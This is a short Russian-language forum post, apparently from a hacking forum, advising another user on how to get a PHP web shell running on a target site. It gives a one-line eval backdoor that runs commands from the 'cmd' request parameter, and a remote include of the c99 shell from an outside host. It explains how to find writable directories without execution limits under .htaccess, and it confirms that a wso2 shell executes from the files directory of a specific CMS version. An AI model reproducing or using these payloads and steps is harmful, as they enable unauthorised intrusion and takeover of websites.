Значит не дурачки админы, тот способ проверялся на Win-платформе, скорее всего правильно расставленные(настроенные) .htaccess

Попробуй вместо "<?php include 'http://www.site.ru/files/c99.php3' ?>" сделай "if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd]));" и посмотри все папки доступные на запись + их содержимое, учитывая .htaccess-ы сверху и внутри и их содержимое, т.е. нужно искать папку, доступную на запись и где нет ограничений на исполнение файлов. Если только корень - значит лить в корень

PS: Уверен что версия 6.14? Такой способ заливки

http://forum.antichat.ru/showpost.php?p=1756391&postcount=6

канает только на ней

еще раз проверил - по умолчанию никаких ограничений в этой ветке нет на исполнение .php3 из http://site.ru/sites/default/files/wso2.php3, файл исполняется, не скачивается